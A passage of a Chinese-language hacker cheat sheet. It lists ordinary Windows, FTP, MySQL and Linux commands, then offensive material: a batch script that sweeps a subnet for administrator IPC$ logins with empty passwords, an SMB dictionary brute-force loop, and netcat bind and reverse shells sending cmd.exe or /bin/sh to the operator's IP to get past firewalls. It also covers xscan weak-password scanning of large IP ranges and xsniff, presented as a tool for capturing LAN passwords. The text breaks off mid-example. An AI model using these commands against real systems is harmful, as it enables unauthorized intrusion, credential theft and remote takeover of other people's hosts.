color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
#3 三:
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告;加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示;
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)--針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問許可權;/G 用戶名:perm 賦予指定用戶訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況
#4 四:
IIS服務命令:
iisreset /reboot 重啟win2k計算機(但有提示系統將重啟信息出現)
iisreset /start或stop 啟動(停止)所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。
FTP 命令: (後面有詳細說明內容)
ftp的命令行格式為:
ftp -v -d -i -n -g[主機名] -v 顯示遠程伺服器的所有響應信息。
-d 使用調試方式。
-n 限制ftp的自動登錄,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote-dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip
#5 五:
MYSQL 命令:
mysql -h主機地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣)
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都帶一個分號作為命令結束符)
show databases; 顯示資料庫列表。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。
use mysql;
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (欄位設定列表); 建表
drop database 庫名;
drop table 表名; 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫:(命令在DOS的\\mysql\\bin目錄下執行);注釋:將資料庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現。
win2003系統下新增命令(實用部份):
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明:/S 關閉主機,/R 重啟主機, /T 數字 設定延時的時間,范圍0~180秒之間, /A取消開機,/M //IP 指定的遠程主機。
例:shutdown /r /t 0 立即重啟本地主機(無延時)
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明:/M 列出當前進程載入的dll文件,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。
#6 六:
Linux系統下基本命令: 要區分大小寫
uname 顯示版本信息(同win2K的 ver)
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件(同win2K的 dir)
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件,rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄,目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器(同win2K)
附:批處理命令與變數
1:for命令及變數 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變數則用:%%i ,而調用變數時用:%i% ,變數是區分大小寫的(%i 不等於 %I)。
批處理每次能處理的變數從%0-%9共10個,其中%0默認給批處理文件名使用,%1默認為使用此批處理時輸入的的第一個值,同理:%2-%9指輸入的第2-9個值;例:net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;「(1 -1 254)」說明:即從254到1 }
command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開
command_parameters:為特定命令指定參數或命令行開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{ (set)為增量形式時 };/F 指從文件中不斷取值,直到取完為止{ (set)為文件時,如(d:\pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認的 %1;%%G 為變數(ip的最後一位);& 用來隔開echo 和net use 這二個命令;| 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認)。
#7 七:
2:if命令及變數 基本格式:
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼,指定條件為「真」。
例:IF errorlevel 0 命令 指程序執行後返回的值為0時,就值行後面的命令;IF not errorlevel 1 命令指程序執行最後返回的值不等於1,就執行後面的命令。
0 指發現並成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配(即:字元串1 等於 字元串2),就執行後面的命令。
例:「if "%2%"=="4" goto start」指:如果輸入的第二個變數為4時,執行後面的命令(注意:調用變數時就%變數名%並加" ")
IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行後面的命令。
例:「if not nc.exe goto end」指:如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來,因為del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;例如:「if exist test.txt. <del test.txt.> else echo test.txt.missing 」,注意命令中的「.」
(二)系統外部命令(均需下載相關工具):
1、瑞士軍刀:nc.exe
參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt >> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因為第二次的結果把第一次的覆蓋了。
#8 八:
2、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機
#9 九:
3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe